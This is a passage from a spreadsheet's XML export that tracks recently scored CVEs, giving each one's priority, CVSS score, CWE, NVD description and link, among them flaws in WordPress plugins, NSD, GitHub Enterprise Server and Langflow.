        <v>0.002</v>
      </c>
      <c r="I1064" s="5" t="inlineStr"/>
      <c r="J1064" s="5" t="inlineStr"/>
      <c r="K1064" s="5" t="inlineStr"/>
      <c r="L1064" s="5" t="inlineStr"/>
      <c r="M1064" s="5" t="inlineStr"/>
      <c r="N1064" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1064" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P1064" s="5" t="inlineStr"/>
      <c r="Q1064" s="5" t="inlineStr">
        <is>
          <t>CWE-1336</t>
        </is>
      </c>
      <c r="R1064" s="5" t="inlineStr">
        <is>
          <t>IBM Verify Identity Access Advanced Access Control may be vulnerable to an information disclosure attack.</t>
        </is>
      </c>
      <c r="S1064" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-13297</t>
        </is>
      </c>
    </row>
    <row r="1065">
      <c r="A1065" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1065" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1065" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-16025</t>
        </is>
      </c>
      <c r="D1065" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E1065" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1065" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1065" s="5" t="inlineStr"/>
      <c r="H1065" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1065" s="5" t="inlineStr"/>
      <c r="J1065" s="5" t="inlineStr"/>
      <c r="K1065" s="5" t="inlineStr"/>
      <c r="L1065" s="5" t="inlineStr"/>
      <c r="M1065" s="5" t="inlineStr"/>
      <c r="N1065" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1065" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1065" s="5" t="inlineStr"/>
      <c r="Q1065" s="5" t="inlineStr">
        <is>
          <t>CWE-1284</t>
        </is>
      </c>
      <c r="R1065" s="5" t="inlineStr">
        <is>
          <t>Improper validation of specified quantity in input vulnerability in PayTR Payment and Electronic Money Institution Inc. PayTR Virtual Pos iFrame API (v9x) WHMCS Module allows Input Data Manipulation.
This issue affects PayTR Virtual Pos iFrame API (v9x) WHMCS Module: from v9.0.0 before v9.0.3.</t>
        </is>
      </c>
      <c r="S1065" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-16025</t>
        </is>
      </c>
    </row>
    <row r="1066">
      <c r="A1066" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1066" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1066" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-16037</t>
        </is>
      </c>
      <c r="D1066" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E1066" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1066" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1066" s="5" t="inlineStr"/>
      <c r="H1066" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1066" s="5" t="inlineStr"/>
      <c r="J1066" s="5" t="inlineStr"/>
      <c r="K1066" s="5" t="inlineStr"/>
      <c r="L1066" s="5" t="inlineStr"/>
      <c r="M1066" s="5" t="inlineStr"/>
      <c r="N1066" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1066" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1066" s="5" t="inlineStr"/>
      <c r="Q1066" s="5" t="inlineStr">
        <is>
          <t>CWE-208</t>
        </is>
      </c>
      <c r="R1066" s="5" t="inlineStr">
        <is>
          <t>Observable timing discrepancy vulnerability in PayTR Payment and Electronic Money Institution Inc. PayTR Virtual Pos iFrame API (v9x) WHMCS Module allows Black Box Reverse Engineering.
This issue affects PayTR Virtual Pos iFrame API (v9x) WHMCS Module: from v9.0.0 before v9.0.3.</t>
        </is>
      </c>
      <c r="S1066" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-16037</t>
        </is>
      </c>
    </row>
    <row r="1067">
      <c r="A1067" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1067" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1067" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-16497</t>
        </is>
      </c>
      <c r="D1067" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E1067" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1067" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G1067" s="5" t="inlineStr"/>
      <c r="H1067" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I1067" s="5" t="inlineStr"/>
      <c r="J1067" s="5" t="inlineStr"/>
      <c r="K1067" s="5" t="inlineStr"/>
      <c r="L1067" s="5" t="inlineStr"/>
      <c r="M1067" s="5" t="inlineStr"/>
      <c r="N1067" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1067" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1067" s="5" t="inlineStr"/>
      <c r="Q1067" s="5" t="inlineStr">
        <is>
          <t>CWE-834</t>
        </is>
      </c>
      <c r="R1067" s="5" t="inlineStr">
        <is>
          <t>NVIDIA Triton Inference Server for Linux contains a vulnerability where an attacker could cause excessive iteration. A successful exploit of this vulnerability might lead to denial of service.</t>
        </is>
      </c>
      <c r="S1067" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-16497</t>
        </is>
      </c>
    </row>
    <row r="1068">
      <c r="A1068" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1068" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1068" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18056</t>
        </is>
      </c>
      <c r="D1068" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E1068" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1068" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G1068" s="5" t="inlineStr"/>
      <c r="H1068" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1068" s="5" t="inlineStr"/>
      <c r="J1068" s="5" t="inlineStr"/>
      <c r="K1068" s="5" t="inlineStr"/>
      <c r="L1068" s="5" t="inlineStr"/>
      <c r="M1068" s="5" t="inlineStr"/>
      <c r="N1068" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1068" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="P1068" s="5" t="inlineStr"/>
      <c r="Q1068" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="R1068" s="5" t="inlineStr">
        <is>
          <t>The HivePress Authentication plugin for WordPress is vulnerable to Authentication Bypass via the access_token parameter in all versions up to, and including, 1.1.4. This is due to the authenticate_user function's Facebook authenticator resolving third-party identity by forwarding the attacker-supplied access_token to the Facebook Graph API and trusting the returned email and ID verbatim, without performing any application ID or audience validation — specifically, no /debug_token verification and no comparison of the token's app_id against the configured hp_facebook_app_id. This makes it possible for unauthenticated attackers to authenticate as any existing WordPress user, including administrators, whose email address is associated with a Facebook account for which the attacker can obtain any valid access token. Important Note: To exploit the vulnerability, the attacker must obtain the victim's access token.</t>
        </is>
      </c>
      <c r="S1068" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18056</t>
        </is>
      </c>
    </row>
    <row r="1069">
      <c r="A1069" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1069" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1069" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18672</t>
        </is>
      </c>
      <c r="D1069" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E1069" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1069" s="5" t="inlineStr">
        <is>
          <t>security@progress.com</t>
        </is>
      </c>
      <c r="G1069" s="5" t="inlineStr"/>
      <c r="H1069" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I1069" s="5" t="inlineStr"/>
      <c r="J1069" s="5" t="inlineStr"/>
      <c r="K1069" s="5" t="inlineStr"/>
      <c r="L1069" s="5" t="inlineStr"/>
      <c r="M1069" s="5" t="inlineStr"/>
      <c r="N1069" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1069" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="P1069" s="5" t="inlineStr"/>
      <c r="Q1069" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R1069" s="5" t="inlineStr">
        <is>
          <t>In Progress® Telerik® UI for AJAX prior to v2026.3.812, insufficient validation of client-supplied state in RadImageEditor may allow an attacker to influence which file is returned by the control's image cache, potentially exposing file contents outside the intended image directories.</t>
        </is>
      </c>
      <c r="S1069" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18672</t>
        </is>
      </c>
    </row>
    <row r="1070">
      <c r="A1070" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1070" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1070" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18916</t>
        </is>
      </c>
      <c r="D1070" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E1070" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1070" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1070" s="5" t="inlineStr"/>
      <c r="H1070" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I1070" s="5" t="inlineStr"/>
      <c r="J1070" s="5" t="inlineStr"/>
      <c r="K1070" s="5" t="inlineStr">
        <is>
          <t>nlnetlabs:nsd</t>
        </is>
      </c>
      <c r="L1070" s="5" t="inlineStr"/>
      <c r="M1070" s="5" t="inlineStr"/>
      <c r="N1070" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1070" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="P1070" s="5" t="inlineStr"/>
      <c r="Q1070" s="5" t="inlineStr">
        <is>
          <t>CWE-191</t>
        </is>
      </c>
      <c r="R1070" s="5" t="inlineStr">
        <is>
          <t>Any remote client can crash a NSD serve child, by throttling the TCP receive window after a TCP query. By continuously crashing the serve childs, the remote client can denial all TCP service to this NSD instance.</t>
        </is>
      </c>
      <c r="S1070" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18916</t>
        </is>
      </c>
    </row>
    <row r="1071">
      <c r="A1071" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1071" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1071" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19080</t>
        </is>
      </c>
      <c r="D1071" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E1071" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1071" s="5" t="inlineStr">
        <is>
          <t>iletisim@usom.gov.tr</t>
        </is>
      </c>
      <c r="G1071" s="5" t="inlineStr"/>
      <c r="H1071" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1071" s="5" t="inlineStr"/>
      <c r="J1071" s="5" t="inlineStr"/>
      <c r="K1071" s="5" t="inlineStr"/>
      <c r="L1071" s="5" t="inlineStr"/>
      <c r="M1071" s="5" t="inlineStr"/>
      <c r="N1071" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1071" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P1071" s="5" t="inlineStr"/>
      <c r="Q1071" s="5" t="inlineStr">
        <is>
          <t>CWE-204</t>
        </is>
      </c>
      <c r="R1071" s="5" t="inlineStr">
        <is>
          <t>Observable response discrepancy vulnerability in Menulux Software Inc. Menulux Portal allows Account Footprinting.
This issue affects Menulux Portal: before 20260903211448.</t>
        </is>
      </c>
      <c r="S1071" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19080</t>
        </is>
      </c>
    </row>
    <row r="1072">
      <c r="A1072" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1072" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1072" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19118</t>
        </is>
      </c>
      <c r="D1072" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E1072" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1072" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1072" s="5" t="inlineStr"/>
      <c r="H1072" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I1072" s="5" t="inlineStr"/>
      <c r="J1072" s="5" t="inlineStr"/>
      <c r="K1072" s="5" t="inlineStr">
        <is>
          <t>github:enterprise_server</t>
        </is>
      </c>
      <c r="L1072" s="5" t="inlineStr"/>
      <c r="M1072" s="5" t="inlineStr"/>
      <c r="N1072" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1072" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="P1072" s="5" t="inlineStr"/>
      <c r="Q1072" s="5" t="inlineStr">
        <is>
          <t>CWE-367</t>
        </is>
      </c>
      <c r="R1072" s="5" t="inlineStr">
        <is>
          <t>A time-of-check time-of-use race condition vulnerability was identified in GitHub Enterprise Server that allowed remote code execution. Exploitation required an authenticated user with write access to a repository and precise timing of concurrent upload requests. This vulnerability affected all versions of GitHub Enterprise Server prior to 3.22 and was fixed in versions 3.17.20, 3.18.14, 3.19.11, 3.20.7, and 3.21.5. This vulnerability was reported via the GitHub Bug Bounty program.</t>
        </is>
      </c>
      <c r="S1072" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19118</t>
        </is>
      </c>
    </row>
    <row r="1073">
      <c r="A1073" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1073" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1073" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19205</t>
        </is>
      </c>
      <c r="D1073" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E1073" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1073" s="5" t="inlineStr">
        <is>
          <t>iletisim@usom.gov.tr</t>
        </is>
      </c>
      <c r="G1073" s="5" t="inlineStr"/>
      <c r="H1073" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1073" s="5" t="inlineStr"/>
      <c r="J1073" s="5" t="inlineStr"/>
      <c r="K1073" s="5" t="inlineStr"/>
      <c r="L1073" s="5" t="inlineStr"/>
      <c r="M1073" s="5" t="inlineStr"/>
      <c r="N1073" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1073" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P1073" s="5" t="inlineStr"/>
      <c r="Q1073" s="5" t="inlineStr">
        <is>
          <t>CWE-204</t>
        </is>
      </c>
      <c r="R1073" s="5" t="inlineStr">
        <is>
          <t>Observable response discrepancy vulnerability in GastroMenum GastroMenum Web Panel allows Account Footprinting.
This issue affects GastroMenum Web Panel: before 31.08.2026.</t>
        </is>
      </c>
      <c r="S1073" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19205</t>
        </is>
      </c>
    </row>
    <row r="1074">
      <c r="A1074" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1074" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1074" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19300</t>
        </is>
      </c>
      <c r="D1074" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E1074" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1074" s="5" t="inlineStr">
        <is>
          <t>psirt@us.ibm.com</t>
        </is>
      </c>
      <c r="G1074" s="5" t="inlineStr"/>
      <c r="H1074" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I1074" s="5" t="inlineStr"/>
      <c r="J1074" s="5" t="inlineStr"/>
      <c r="K1074" s="5" t="inlineStr">
        <is>
          <t>apple:macos, langflow:langflow, linux:linux_kernel, microsoft:windows</t>
        </is>
      </c>
      <c r="L1074" s="5" t="inlineStr"/>
      <c r="M1074" s="5" t="inlineStr"/>
      <c r="N1074" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1074" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P1074" s="5" t="inlineStr"/>
      <c r="Q1074" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="R1074" s="5" t="inlineStr">
        <is>
          <t>IBM Langflow OSS 1.0.0 through 1.11.2 could allow a remote attacker to obtain sensitive information due to incomplete scrubbing of sensitive credential fields.</t>
        </is>
      </c>
      <c r="S1074" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19300</t>
        </is>
      </c>
    </row>
    <row r="1075">
      <c r="A1075" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1075" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1075" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19305</t>
        </is>
      </c>
      <c r="D1075" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E1075" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1075" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1075" s="5" t="inlineStr"/>
      <c r="H1075" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1075" s="5" t="inlineStr"/>
      <c r="J1075" s="5" t="inlineStr"/>
      <c r="K1075" s="5" t="inlineStr">
        <is>
          <t>apple:macos, langflow:langflow, linux:linux_kernel, microsoft:windows</t>
        </is>
      </c>
      <c r="L1075" s="5" t="inlineStr"/>
      <c r="M1075" s="5" t="inlineStr"/>
      <c r="N1075" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1075" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P1075" s="5" t="inlineStr"/>
      <c r="Q1075" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R1075" s="5" t="inlineStr">
        <is>
          <t>IBM Langflow OSS 1.0.0 through 1.11.2 could allow a remote attacker to obtain sensitive information due to server-side request forgery.</t>
        </is>
      </c>
      <c r="S1075" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19305</t>
        </is>
      </c>
    </row>
    <row r="1076">
      <c r="A1076" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1076" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1076" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19401</t>
        </is>
      </c>
      <c r="D1076" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E1076" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1076" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1076" s="5" t="inlineStr"/>
      <c r="H1076" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I1076" s="5" t="inlineStr"/>
      <c r="J1076" s="5" t="inlineStr"/>
      <c r="K1076" s="5" t="inlineStr">
        <is>
          <t>nlnetlabs:nsd</t>
        </is>
      </c>
      <c r="L1076" s="5" t="inlineStr"/>
      <c r="M1076" s="5" t="inlineStr"/>
      <c r="N1076" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1076" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="P1076" s="5" t="inlineStr"/>
      <c r="Q1076" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-617</t>
        </is>
      </c>
      <c r="R1076" s="5" t="inlineStr">
        <is>
          <t>Any remote client can crash a (debugging/non-release build type) NSD serve child by sending it a special crafted message with a specially tuned number of DNS Cookie options (17 when UDP payload size is 512). By continuously crashing the serve childs, the remote client can severely hamper or, when positioned sufficiently close, deny all DNS service.</t>
        </is>
      </c>
      <c r="S1076" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19401</t>
        </is>
      </c>
    </row>
    <row r="1077">
      <c r="A1077" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1077" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1077" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19538</t>
        </is>
      </c>
      <c r="D1077" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E1077" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1077" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1077" s="5" t="inlineStr"/>
      <c r="H1077" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1077" s="5" t="inlineStr"/>
      <c r="J1077" s="5" t="inlineStr"/>
      <c r="K1077" s="5" t="inlineStr">
        <is>
          <t>nlnetlabs:nsd</t>
        </is>
      </c>
      <c r="L1077" s="5" t="inlineStr"/>
      <c r="M1077" s="5" t="inlineStr"/>
      <c r="N1077" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1077" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="P1077" s="5" t="inlineStr"/>
      <c r="Q1077" s="5" t="inlineStr">
        <is>
          <t>CWE-290, CWE-672</t>
        </is>
      </c>
      <c r="R1077" s="5" t="inlineStr">
        <is>
          <t>The BLOCKED access control list items that are evaluated to deny access on the the proxy protocol port can be bypassed completely when connecting over TCP or TLS and sending the query twice on connection that is kept open.</t>
        </is>
      </c>
      <c r="S1077" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19538</t>
        </is>
      </c>
    </row>
    <row r="1078">
      <c r="A1078" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1078" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1078" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19858</t>
        </is>
      </c>
      <c r="D1078" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E1078" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1078" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1078" s="5" t="inlineStr"/>
      <c r="H1078" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1078" s="5" t="inlineStr"/>
      <c r="J1078" s="5" t="inlineStr"/>
      <c r="K1078" s="5" t="inlineStr"/>
      <c r="L1078" s="5" t="inlineStr"/>
      <c r="M1078" s="5" t="inlineStr"/>
      <c r="N1078" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1078" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="P1078" s="5" t="inlineStr"/>
      <c r="Q1078" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="R1078" s="5" t="inlineStr">
        <is>
          <t>The JetFormBuilder — Dynamic Blocks Form Builder WordPress plugin before 3.6.5.2 does not perform authorisation checks when resolving request-derived data during page rendering, allowing unauthenticated users to read arbitrary user, post and term properties and metadata, including password hashes, private and draft content, and secrets other JetFormBuilder — Dynamic Blocks Form Builder WordPress plugin before 3.6.5.2 store in metadata.</t>
        </is>
      </c>
      <c r="S1078" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19858</t>
        </is>
      </c>
    </row>
    <row r="1079">
      <c r="A1079" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1079" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1079" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-26456</t>
        </is>
      </c>
      <c r="D1079" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E1079" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1079" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1079" s="5" t="inlineStr"/>
      <c r="H1079" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1079" s="5" t="inlineStr"/>
      <c r="J1079" s="5" t="inlineStr"/>
      <c r="K1079" s="5" t="inlineStr"/>
      <c r="L1079" s="5" t="inlineStr"/>
      <c r="M1079" s="5" t="inlineStr"/>
      <c r="N1079" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1079" s="5" t="inlineStr">
        <is>
          <t>2026-08-27</t>
        </is>
      </c>
      <c r="P1079" s="5" t="inlineStr"/>
      <c r="Q1079" s="5" t="inlineStr">
        <is>
          <t>CWE-362, CWE-476</t>
        </is>
      </c>
      <c r="R1079" s="5" t="inlineStr">
        <is>
          <t>A null pointer dereference vulnerability exists in the server-side session management logic of ccoap 77f55c4b466e99327c24ace8a2913d3ba7e2ccd5. The issue is caused by a race condition between the request dispatch thread and the session cleanup thread when accessing shared session list nodes without proper synchronization.</t>
        </is>
      </c>
      <c r="S1079" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-26456</t>
        </is>
      </c>
    </row>
    <row r="1080">
      <c r="A1080" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1080" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1080" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28604</t>
        </is>
      </c>
      <c r="D1080" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E1080" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1080" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1080" s="5" t="inlineStr"/>
      <c r="H1080" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1080" s="5" t="inlineStr"/>
      <c r="J1080" s="5" t="inlineStr"/>
      <c r="K1080" s="5" t="inlineStr">
        <is>
          <t>google:android</t>
        </is>
      </c>
      <c r="L1080" s="5" t="inlineStr"/>
      <c r="M1080" s="5" t="inlineStr"/>
      <c r="N1080" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1080" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1080" s="5" t="inlineStr"/>
      <c r="Q1080" s="5" t="inlineStr">
        <is>
          <t>CWE-362</t>
        </is>
      </c>
      <c r="R1080" s="5" t="inlineStr">
        <is>
          <t>In multiple locations, there is a possible use after free due to a race condition. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="S1080" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28604</t>
        </is>
      </c>
    </row>
    <row r="1081">
      <c r="A1081" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1081" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1081" s="5" t="inlineStr">
        <is>
